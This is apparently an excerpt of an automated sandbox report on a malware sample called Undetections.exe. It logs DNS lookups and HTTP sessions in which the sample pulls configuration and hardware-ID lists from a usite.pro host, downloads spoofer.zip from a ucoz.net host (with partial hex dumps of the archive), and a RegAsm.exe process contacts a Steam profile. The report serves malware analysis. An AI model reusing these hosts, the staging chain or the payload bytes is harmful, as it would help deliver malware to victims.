                                                                                                                                                                                                          Apr 10, 2024 08:56:07.274513006 CEST172.253.115.113192.168.2.4555aEcho Reply

                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                          Apr 10, 2024 08:56:05.767522097 CEST192.168.2.41.1.1.10xb384Standard query (0)universalbeure.usite.proA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Apr 10, 2024 08:56:07.084978104 CEST192.168.2.41.1.1.10xb547Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Apr 10, 2024 08:56:12.161106110 CEST192.168.2.41.1.1.10x6814Standard query (0)ashjghas.ucoz.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Apr 10, 2024 08:56:15.243285894 CEST192.168.2.41.1.1.10x4c2bStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                          Apr 10, 2024 08:56:06.037813902 CEST1.1.1.1192.168.2.40xb384No error (0)universalbeure.usite.pro193.109.246.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Apr 10, 2024 08:56:07.178184032 CEST1.1.1.1192.168.2.40xb547No error (0)google.com172.253.115.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Apr 10, 2024 08:56:07.178184032 CEST1.1.1.1192.168.2.40xb547No error (0)google.com172.253.115.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Apr 10, 2024 08:56:07.178184032 CEST1.1.1.1192.168.2.40xb547No error (0)google.com172.253.115.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Apr 10, 2024 08:56:07.178184032 CEST1.1.1.1192.168.2.40xb547No error (0)google.com172.253.115.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Apr 10, 2024 08:56:07.178184032 CEST1.1.1.1192.168.2.40xb547No error (0)google.com172.253.115.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Apr 10, 2024 08:56:07.178184032 CEST1.1.1.1192.168.2.40xb547No error (0)google.com172.253.115.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Apr 10, 2024 08:56:12.256167889 CEST1.1.1.1192.168.2.40x6814No error (0)ashjghas.ucoz.net193.109.246.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Apr 10, 2024 08:56:15.336468935 CEST1.1.1.1192.168.2.40x4c2bNo error (0)steamcommunity.com104.102.129.112A (IP address)IN (0x0001)false

                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                          • universalbeure.usite.pro
                                                                                                                                                                                                          • ashjghas.ucoz.net
                                                                                                                                                                                                          • steamcommunity.com
                                                                                                                                                                                                          • 95.217.212.139

                                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          0192.168.2.449732193.109.246.1004437308C:\Users\user\Desktop\Undetections.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-04-10 06:56:06 UTC103OUTGET /STLprograms/NEW/z-Closing.txt HTTP/1.1
                                                                                                                                                                                                          Host: universalbeure.usite.pro
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          2024-04-10 06:56:07 UTC324INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:05 GMT
                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                          Content-Length: 3
                                                                                                                                                                                                          Last-Modified: Thu, 21 Mar 2024 15:19:47 GMT
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          ETag: "65fc5013-3"
                                                                                                                                                                                                          Expires: Tue, 30 Apr 2024 06:56:05 GMT
                                                                                                                                                                                                          Cache-Control: max-age=1728000
                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                          2024-04-10 06:56:07 UTC3INData Raw: 31 30 30
                                                                                                                                                                                                          Data Ascii: 100


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          1192.168.2.449734193.109.246.1004437308C:\Users\user\Desktop\Undetections.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-04-10 06:56:07 UTC74OUTGET /STLprograms/NEW/hwid.txt HTTP/1.1
                                                                                                                                                                                                          Host: universalbeure.usite.pro
                                                                                                                                                                                                          2024-04-10 06:56:08 UTC327INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:06 GMT
                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                          Content-Length: 183
                                                                                                                                                                                                          Last-Modified: Tue, 26 Mar 2024 11:07:32 GMT
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          ETag: "6602ac74-b7"
                                                                                                                                                                                                          Expires: Tue, 30 Apr 2024 06:56:06 GMT
                                                                                                                                                                                                          Cache-Control: max-age=1728000
                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                          2024-04-10 06:56:08 UTC183INData Raw: 53 2d 31 2d 35 2d 32 31 2d 31 38 37 38 35 36 33 38 36 33 2d 32 36 32 37 33 37 33 32 30 37 2d 33 31 31 34 31 32 37 33 33 33 2d 31 30 30 31 0a 53 2d 31 2d 35 2d 32 31 2d 32 34 39 39 36 32 30 37 39 39 2d 32 34 31 35 33 31 36 38 39 31 2d 38 37 34 30 38 34 35 34 36 2d 31 30 30 31 0a 53 2d 31 2d 35 2d 32 31 2d 33 32 30 37 38 37 35 35 2d 31 37 36 39 31 31 34 32 35 34 31 2d 31 30 34 38 30 33 30 35 37 35 2d 31 30 30 31 0a 53 2d 31 2d 35 2d 32 31 2d 33 32 30 37 38 37 35 35 2d 31 37 36 39 31 31 34 32 35 34 2d 31 30 34 38 30 33 30 35 37 35 2d 31 30 30 31
                                                                                                                                                                                                          Data Ascii: S-1-5-21-1878563863-2627373207-3114127333-1001S-1-5-21-2499620799-2415316891-874084546-1001S-1-5-21-32078755-17691142541-1048030575-1001S-1-5-21-32078755-1769114254-1048030575-1001


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          2192.168.2.449735193.109.246.1004437308C:\Users\user\Desktop\Undetections.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-04-10 06:56:08 UTC83OUTGET /STLprograms/NEW/qwxisix/hwids.txt HTTP/1.1
                                                                                                                                                                                                          Host: universalbeure.usite.pro
                                                                                                                                                                                                          2024-04-10 06:56:09 UTC326INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:07 GMT
                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                          Content-Length: 45
                                                                                                                                                                                                          Last-Modified: Mon, 01 Apr 2024 20:18:36 GMT
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          ETag: "660b169c-2d"
                                                                                                                                                                                                          Expires: Tue, 30 Apr 2024 06:56:07 GMT
                                                                                                                                                                                                          Cache-Control: max-age=1728000
                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                          2024-04-10 06:56:09 UTC45INData Raw: 53 2d 31 2d 35 2d 32 31 2d 31 34 36 32 30 36 30 31 32 35 2d 36 37 30 32 35 39 39 33 36 2d 32 32 36 32 34 37 33 38 30 37 2d 31 30 30 31
                                                                                                                                                                                                          Data Ascii: S-1-5-21-1462060125-670259936-2262473807-1001


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          3192.168.2.449737193.109.246.1004437308C:\Users\user\Desktop\Undetections.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-04-10 06:56:09 UTC100OUTGET /STLprograms/NEW/qwxisix/Undetections/BuildLink.txt HTTP/1.1
                                                                                                                                                                                                          Host: universalbeure.usite.pro
                                                                                                                                                                                                          2024-04-10 06:56:10 UTC326INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:08 GMT
                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                          Content-Length: 37
                                                                                                                                                                                                          Last-Modified: Tue, 02 Apr 2024 16:31:09 GMT
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          ETag: "660c32cd-25"
                                                                                                                                                                                                          Expires: Tue, 30 Apr 2024 06:56:08 GMT
                                                                                                                                                                                                          Cache-Control: max-age=1728000
                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                          2024-04-10 06:56:10 UTC37INData Raw: 68 74 74 70 73 3a 2f 2f 61 73 68 6a 67 68 61 73 2e 75 63 6f 7a 2e 6e 65 74 2f 73 70 6f 6f 66 65 72 2e 7a 69 70
                                                                                                                                                                                                          Data Ascii: https://ashjghas.ucoz.net/spoofer.zip


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          4192.168.2.449739193.109.246.1004437308C:\Users\user\Desktop\Undetections.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-04-10 06:56:10 UTC100OUTGET /STLprograms/NEW/qwxisix/Undetections/BuildName.txt HTTP/1.1
                                                                                                                                                                                                          Host: universalbeure.usite.pro
                                                                                                                                                                                                          2024-04-10 06:56:11 UTC325INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:09 GMT
                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                          Last-Modified: Tue, 02 Apr 2024 16:31:09 GMT
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          ETag: "660c32cd-b"
                                                                                                                                                                                                          Expires: Tue, 30 Apr 2024 06:56:09 GMT
                                                                                                                                                                                                          Cache-Control: max-age=1728000
                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                          2024-04-10 06:56:11 UTC11INData Raw: 73 70 6f 6f 66 65 72 2e 65 78 65
                                                                                                                                                                                                          Data Ascii: spoofer.exe


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          5192.168.2.449740193.109.246.1004437308C:\Users\user\Desktop\Undetections.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-04-10 06:56:11 UTC103OUTGET /STLprograms/NEW/qwxisix/Undetections/BuildZipName.txt HTTP/1.1
                                                                                                                                                                                                          Host: universalbeure.usite.pro
                                                                                                                                                                                                          2024-04-10 06:56:12 UTC325INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:10 GMT
                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                          Last-Modified: Tue, 02 Apr 2024 16:31:09 GMT
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          ETag: "660c32cd-b"
                                                                                                                                                                                                          Expires: Tue, 30 Apr 2024 06:56:10 GMT
                                                                                                                                                                                                          Cache-Control: max-age=1728000
                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                          2024-04-10 06:56:12 UTC11INData Raw: 73 70 6f 6f 66 65 72 2e 7a 69 70
                                                                                                                                                                                                          Data Ascii: spoofer.zip


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          6192.168.2.449741193.109.246.1004437308C:\Users\user\Desktop\Undetections.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-04-10 06:56:13 UTC78OUTGET /spoofer.zip HTTP/1.1
                                                                                                                                                                                                          Host: ashjghas.ucoz.net
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          2024-04-10 06:56:13 UTC338INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:12 GMT
                                                                                                                                                                                                          Content-Type: application/zip
                                                                                                                                                                                                          Content-Length: 215501
                                                                                                                                                                                                          Last-Modified: Mon, 08 Apr 2024 12:39:02 GMT
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          ETag: "6613e566-349cd"
                                                                                                                                                                                                          Expires: Tue, 30 Apr 2024 06:56:12 GMT
                                                                                                                                                                                                          Cache-Control: max-age=1728000
                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                          2024-04-10 06:56:13 UTC16046INData Raw: 50 4b 03 04 14 00 00 00 08 00 cd 8c 88 58 4f 5f 40 f0 31 49 03 00 00 58 03 00 0b 00 00 00 73 70 6f 6f 66 65 72 2e 65 78 65 ac b8 05 54 1d 4b d3 28 ba 71 77 77 0d ee 0e c1 dd dd dd 2d b8 bb 43 08 1a 3c b8 05 87 e0 1e dc dd 2d b8 3b 41 83 c3 db 70 ce f9 e4 fe f7 de b7 de 5a af 67 4f 75 59 57 57 55 77 d7 cc 1e 39 ed af 00 30 00 00 00 0e bc 5f 5f 01 80 26 c0 5f 4d 10 f0 ff de 02 80 37 22 51 0b 22 a0 0e 66 8c a4 09 44 76 8c 44 d5 d2 ca 99 d8 c1 c9 de c2 c9 c8 96 d8 c4 c8 ce ce de 85 d8 d8 8c d8 c9 d5 8e d8 ca 8e 58 54 41 85 d8 d6 de d4 8c 01 01 01 96 fc 6f 1b 8a 62 00 80 2c 08 18 20 52 bf bf ee 1f bb 1b 00 52 00 1c 08 13 00 20 0f f4 0c fa 2f 5e 3f 2b 10 10 bf 4d 0a f6 97 77 6f 38 e8 5f 7e bf 35 c8 7f 06 77 82 bd f3 df 1a 18 c0 30 14 00 40 7e ff fd bb ff 57 f7
                                                                                                                                                                                                          Data Ascii: PKXO_@1IXspoofer.exeTK(qww-C<-;ApZgOuYWWUw90__&_M7"Q"fDvDXTAob, RR /^?+Mwo8_~5w0@~W
                                                                                                                                                                                                          2024-04-10 06:56:13 UTC16384INData Raw: b5 d0 75 39 f2 5a d4 04 79 40 fe 30 b0 92 f2 b1 94 6a 90 38 f2 84 3b 5c 08 a9 0d 89 31 b7 09 ed a3 ae 34 53 fc 14 ae a4 b2 7f ce bf 24 9a 08 2d 23 3f c5 cd 48 37 15 de c0 7c 12 5e c8 7e 66 f6 db 76 d1 da 27 f2 7e 98 f6 9b be 7a ad b8 b8 7b cc 95 c5 90 0b 6b a2 53 44 35 15 e9 9f df dc 2d 05 ca c9 7c 23 43 5f 1b 26 e1 3c db cf 27 e0 e4 40 b8 48 60 69 cd 16 61 3c 12 11 0c 7d 12 39 71 85 a8 59 dd 5e 38 63 10 44 17 7f 7d fa b3 5a fe d1 c8 a5 8f a9 19 ca 7f a5 bf 08 cf af 9c a4 78 6b 12 3f 0e 65 65 e8 b8 62 dd 1e e4 82 e3 87 12 c4 08 a6 bb ca 6f 87 43 55 a6 94 02 11 7e 3f d5 9d 05 12 ba 83 0f 19 d3 f3 3c 21 84 4b 47 9a bf 6c 76 3e e4 94 13 f7 6b 4d 04 9c 72 d0 9f 24 b7 45 6e 5c 4d 7a 2e 84 a0 04 1e 2d 6f 0c 09 16 78 4b 6c 48 49 ae c3 7e 91 7e e6 8f 4f 61 6a d9
                                                                                                                                                                                                          Data Ascii: u9Zy@0j8;\14S$-#?H7|^~fv'~z{kSD5-|#C_&<'@H`ia<}9qY^8cD}Zxk?eeboCU~?<!KGlv>kMr$En\Mz.-oxKlHI~~Oaj
                                                                                                                                                                                                          2024-04-10 06:56:13 UTC16384INData Raw: 70 64 8b 53 eb 9e 55 81 f7 79 c2 ee dc 0f 5e 6e 8d 7f ee 8e 54 eb e4 72 92 b8 dc 4b 03 c7 d3 53 77 2d c9 40 a4 96 a1 ab fd c8 d7 c2 6b 90 49 de 1f f0 b4 2a d3 fa f9 ab ab 75 e8 0e e2 73 50 41 b4 5b 7d e5 35 40 23 71 85 a7 ad 1e 35 00 b4 93 0d 7d e5 dc 07 23 e6 9c 9f c4 4c 8a 35 23 6d 64 bb 0e 79 2a 87 a8 e6 b0 64 37 4c 5f be 9b 4b b0 b0 5a ce 7c 30 3a 5d c6 93 b8 b6 d7 05 4a 19 96 f7 4f 8d a2 26 65 69 37 85 19 e8 f3 e6 dd 04 f6 00 f3 c1 c6 72 5c 82 01 d6 60 57 51 75 c0 38 ab e5 73 43 0e f1 14 9a 85 9b d9 6b 96 c8 15 a9 96 5d eb ad 2b 6b f5 51 3e 06 ed 9f 93 96 02 42 a4 13 8d 55 41 b7 46 fa d9 94 46 ec 8f 05 56 72 45 59 c2 e2 57 09 23 89 3f 67 7f ba 79 d3 9a 06 7b 24 97 15 16 23 4f 8d af 67 05 53 2b 5e 92 71 06 57 dc 89 be 48 8b 21 50 b8 d5 80 4b a4 9c 78
                                                                                                                                                                                                          Data Ascii: pdSUy^nTrKSw-@kI*usPA[}5@#q5}#L5#mdy*d7L_KZ|0:]JO&ei7r\`WQu8sCk]+kQ>BUAFFVrEYW#?gy{$#OgS+^qWH!PKx
                                                                                                                                                                                                          2024-04-10 06:56:13 UTC16384INData Raw: 2a ff 91 59 c4 23 cb 3c cd db 7b 76 31 4e b6 b6 7e bc 98 21 08 c3 9c 7d c8 08 a8 2b b9 dc 34 ab 81 31 6a b2 93 a0 6f f4 51 e2 ff b4 61 16 0f 67 80 29 4f 1c 02 37 b4 fc 6f a7 2b cc 6e 18 f4 c2 e3 47 d7 bf d9 43 d7 37 65 52 af 82 c9 94 83 8e 28 e7 73 71 6a 3b 9a 31 9d d3 99 f1 36 24 8d e0 9b 3a 94 24 be 89 6b 8e f9 b2 5a 40 56 93 c4 b5 7e f1 e1 c2 da c1 a6 d7 94 c9 94 c0 27 08 0f 8a 45 61 25 83 f6 98 b9 e6 63 51 67 6c a8 d5 bc ef e4 71 92 34 4f 0b 84 92 1a 63 88 69 9d 2a ed 63 31 9d 7a 2c 43 cd 9e f3 5d 1d 0d b9 bb c2 64 2d 3a 61 06 05 19 38 97 d2 c1 88 e6 e4 ea 08 74 56 6a 83 68 b2 9b 51 f8 7c 93 47 f0 e5 9a 5a 2c 21 fe fa 77 be 71 58 ee 9e 66 2b d6 b0 a4 77 20 b9 88 7f c0 b6 e2 ce 36 f9 5f 31 de 05 4c 97 0f 19 3f 79 ed ae ad 0f 59 af 42 d8 ca fa 2d de 77
                                                                                                                                                                                                          Data Ascii: *Y#<{v1N~!}+41joQag)O7o+nGC7eR(sqj;16$:$kZ@V~'Ea%cQglq4Oci*c1z,C]d-:a8tVjhQ|GZ,!wqXf+w 6_1L?yYB-w
                                                                                                                                                                                                          2024-04-10 06:56:13 UTC16384INData Raw: 0d e3 6e 5a c8 79 ce db 59 ab d8 e6 6b 49 79 5b 25 e3 cb 55 92 ab f2 33 47 c3 a1 30 c1 7a 4b 8b 6b ed 4c 99 cb 66 56 4f 7f 12 ea 95 05 bb d6 c4 dc ba ae 32 fd 94 cd 75 19 a4 f6 7a 63 57 8e b6 1e d4 09 d6 99 d1 63 81 de 37 fd 45 5a 5f 7c 5e 96 58 bd ea af 6e b7 53 9a c8 93 36 c2 73 cc 01 3c ff e3 5e 33 39 83 01 ce 2c 85 12 93 0a a3 ff c5 56 43 ea 65 72 07 29 81 e1 98 2f bf 25 4f 41 e7 df 10 af b6 7a 32 ff a5 27 41 26 fc 52 1f d9 05 aa cc af 86 61 ad fc 0b e8 15 f7 20 fd 42 d2 58 e8 97 dd 9a f3 38 02 d8 c7 d8 96 6a 60 11 1f 23 14 ba 36 6f 49 61 67 b6 74 92 aa a4 a7 72 90 93 7c 6f 70 93 0e eb bd b6 93 56 51 3b 7a d0 b9 87 4f 3a 4d 3e 91 52 71 8f 74 55 e8 61 50 31 85 59 c0 01 a1 c9 8c e9 6a 8d 8c 8b 47 bb b4 dc 6d e8 73 fa 08 c9 8d 08 d5 e9 bc 76 fd 18 18 52
                                                                                                                                                                                                          Data Ascii: nZyYkIy[%U3G0zKkLfVO2uzcWc7EZ_|^XnS6s<^39,VCer)/%OAz2'A&Ra BX8j`#6oIagtr|opVQ;zO:M>RqtUaP1YjGmsvR
                                                                                                                                                                                                          2024-04-10 06:56:14 UTC16384INData Raw: 4e 7e aa f5 5f 96 18 2e 93 10 b8 72 7d 7e c5 7f b9 ca cc 3a 1a 28 c8 6a 0d fd 9b 98 66 e6 90 e5 b7 bb c7 52 f0 d3 e7 ce de df 85 76 e6 0b 68 06 e6 e8 7f a6 e2 8c 8d f3 94 db ee 96 59 9b 83 3a ac 1a 05 eb 21 0d b5 6f dc 27 c3 3b 73 5f c6 a9 a1 9d 18 19 15 f1 c3 7b 8d 49 ca 4a fa 27 b3 f6 7c 28 d5 54 2a c8 6b 33 1b 1a 0b a1 c4 ac 7f 7b 5e 96 1c e7 5c ef d6 d8 2f 1e 90 64 c3 73 89 ba d1 b5 7b da 48 60 dc ee 2e 20 f6 8f 5d 9d 10 d0 36 24 7e f3 c8 a6 69 65 63 7b 05 e0 8c 2d 45 ee ba d3 fb 97 ab 60 74 61 31 c7 0d 77 dd 5a 5a c7 19 ef 0f db f8 9a 69 4a c4 cf dd 06 8d bb 03 0b ad 3c 0b fe de 52 c6 39 c7 7c 12 35 28 a1 33 82 98 fe 9d 54 e7 48 b6 f4 c3 72 9f 9b c6 17 b2 1d e7 da 53 36 2d 02 14 43 31 23 5c 33 6e a2 f4 40 21 86 5e 56 4e 59 ef 48 5c ba 45 5c 38 ba 90
                                                                                                                                                                                                          Data Ascii: N~_.r}~:(jfRvhY:!o';s_{IJ'|(T*k3{^\/ds{H`. ]6$~iec{-E`ta1wZZiJ<R9|5(3THrS6-C1#\3n@!^VNYH\E\8
                                                                                                                                                                                                          2024-04-10 06:56:14 UTC16384INData Raw: c4 fd 1c 5d 3b ff 07 05 4e 4b 0e b4 58 9d 39 f0 7a 08 cd 76 ae b2 b6 46 e6 12 c1 4f d5 ef 2e a4 28 cf e6 bf d0 fd fe 61 3e 8f 8e 43 71 4a ca ca 29 fe d0 f3 58 b5 ec 92 73 40 a0 d1 ac 61 98 89 b9 25 50 c3 d3 0a fd 4d fc 11 ff 88 8b cf b5 c2 bb 9a 32 f5 4b af d7 98 9f a3 42 00 6d f6 a6 a3 3a fb 8d 86 a1 64 d8 00 82 b4 74 5e 32 22 ec a1 2f f2 4c 1b 21 5e f5 8d 7f 6b 8e d1 c6 af 86 61 45 8b ca 84 ba 03 9d 1b 94 8e a5 f9 3b bc bb e8 80 78 67 76 e9 75 83 ac 49 78 9c 98 dd 01 58 ff 09 60 50 f8 2f 0b 75 c8 48 9e 2f dc 40 60 15 ad d4 c4 bd f7 d8 53 88 93 17 e1 e0 35 98 18 16 fc 5a 42 6a ba 43 92 82 ca f0 7c e2 77 b9 94 55 e1 2f ab 70 f2 3f 2d f9 c5 57 88 e0 47 49 1a cc 56 56 73 41 02 04 cb d3 74 ea 1f 2c a7 1e 57 ba 8c 53 1f de 9a 53 4c e8 0a da be b2 3c ba d3 41
                                                                                                                                                                                                          Data Ascii: ];NKX9zvFO.(a>CqJ)Xs@a%PM2KBm:dt^2"/L!^kaE;xgvuIxX`P/uH/@`S5ZBjC|wU/p?-WGIVVsAt,WSSL<A
                                                                                                                                                                                                          2024-04-10 06:56:14 UTC16384INData Raw: 2c 01 58 29 01 84 3b 46 41 39 83 56 a5 f4 53 51 16 37 6f 3e e0 bf d9 b2 8a f7 29 a7 c5 93 4a 3c 52 95 3d 29 f9 e0 2e 9b 23 94 1e 75 51 40 41 6f 29 6a 2c bd f3 c4 aa ed aa ed be 8a 03 f7 3d f3 9c d1 8d 64 09 f2 6a 95 37 61 85 9c ee 2f 2b 42 e9 1b 8b 4d 4c 45 90 d9 60 c2 df 4e 3f da d4 30 1f 27 aa e8 84 ce 52 98 02 13 bc e3 3c ff 79 0e 21 89 85 de f9 fc d0 51 6e 2c 9c c5 3c 1b 4f 1b e4 1c a0 12 87 57 e4 ed 61 5e b2 42 4c 7c 76 10 d5 6c fa 49 26 c7 45 6f 13 47 9b 79 0a 31 12 af 29 bd ee 23 2f 22 94 13 a2 9d c1 01 0f 28 3f 4e 43 cf fa c6 a5 cc 0b bb 2f eb 5d 92 43 95 27 bc d8 0f e2 27 5a 50 28 ec da 73 c6 90 6a 97 d8 ca 8c bc f8 d6 ef d7 b2 e8 0f f7 ed 32 b2 fa 70 b9 9a d0 84 6c 8d de 8b 7d 11 1e f3 af d7 1d aa 3e a3 25 46 38 82 59 d8 b2 4d 1a 55 d4 96 09 09
                                                                                                                                                                                                          Data Ascii: ,X);FA9VSQ7o>)J<R=).#uQ@Ao)j,=dj7a/+BMLE`N?0'R<y!Qn,<OWa^BL|vlI&EoGy1)#/"(?NC/]C''ZP(sj2pl}>%F8YMU
                                                                                                                                                                                                          2024-04-10 06:56:14 UTC16384INData Raw: 06 00 f9 f2 91 6a 43 a1 00 01 20 99 74 c7 bc 19 09 6a 95 be 38 ff b4 4a 0e 21 91 22 3f d9 5a af 0e ae 4b 59 53 12 ad 52 90 b2 85 94 88 d1 87 1d 62 f8 4c d3 26 bd ee 64 5f c6 9b f9 1f a8 76 04 8d 01 c7 9e 07 26 2f de fa 2b 35 c6 15 18 b3 c8 f5 57 00 e3 b0 33 72 ce 53 79 ea 54 46 8a 2c bb cd 0c 89 ed f2 89 b4 3d 1f bb aa 0d 43 6b 8f 34 89 13 18 cf 9f 4a 89 dd 2e 7b ed 82 c5 7c 51 c4 83 18 77 b4 34 e8 e0 cb d8 8f 58 c5 f1 de 0b f9 7b fa 9b 2b 74 e1 df fd 95 e2 36 8c 04 b6 cd 04 79 ed ca b9 16 23 a5 47 c6 64 e8 06 16 c9 9d cf 4c 74 cb 7d 46 f3 44 14 7e d5 95 5a d4 70 09 70 c6 f3 40 44 fc d3 b1 66 ce 1b e2 95 6b 46 84 ac cf 7a 1e a7 24 3c be 71 02 de 79 59 d7 35 8f db 32 39 c0 8b aa df 57 5f f4 97 5b d6 5c b1 c8 e0 25 84 15 ab 99 bd c9 28 ef ec 07 51 54 8f 08
                                                                                                                                                                                                          Data Ascii: jC tj8J!"?ZKYSRbL&d_v&/+5W3rSyTF,=Ck4J.{|Qw4X{+t6y#GdLt}FD~Zpp@DfkFz$<qyY529W_[\%(QT
                                                                                                                                                                                                          2024-04-10 06:56:14 UTC16384INData Raw: 41 8a ba 37 3b cf 16 f3 dc d2 73 5e 84 d7 52 ad 43 30 3a 74 e2 a6 d9 5e 93 cc 11 6a aa d0 f8 95 b3 9a f2 29 6d c7 47 31 ec c5 ff 9a 0d 8b c1 2b 24 47 d9 3c cf 0b a6 b7 26 af 31 d2 a6 aa 8f b8 ca 66 18 ea 72 f8 69 ff 09 fc 12 15 bc 05 97 07 64 91 4d 57 9f fd da 6d 60 86 05 e9 c2 f3 b3 c0 15 59 eb 6d 9a 76 fa c4 2b ce b8 83 be a3 49 40 f3 03 4f 83 2a 6b f1 2d ab d8 0a de 8b a3 55 d4 ac 1f 1c ee a8 1d 86 ed aa b1 c3 60 aa 14 9d 3e 8f b6 72 f7 d5 7f 57 cf a3 9a 38 0a d3 dd 2f 93 24 7c 41 d4 91 c3 c9 c7 76 84 c0 93 c3 66 59 d2 88 91 8f 99 67 4c 98 c2 81 6c ec 58 29 14 75 5a 98 04 d7 46 ce 2e 27 4c 76 ea 51 a0 9a 77 22 60 0e e9 c5 34 cb 47 7a 8a ad c9 34 97 bc dd 36 d0 a4 44 94 fd 86 b4 86 31 62 dc f9 59 9d be 43 5e fb b7 8e 9f 4c 79 16 88 b0 7b 64 05 ab 4e f7
                                                                                                                                                                                                          Data Ascii: A7;s^RC0:t^j)mG1+$G<&1fridMWm`Ymv+I@O*k-U`>rW8/$|AvfYgLlX)uZF.'LvQw"`4Gz46D1bYC^Ly{dN


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          7192.168.2.449742104.102.129.1124437652C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-04-10 06:56:15 UTC119OUTGET /profiles/76561199662282318 HTTP/1.1
                                                                                                                                                                                                          Host: steamcommunity.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          2024-04-10 06:56:15 UTC1882INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
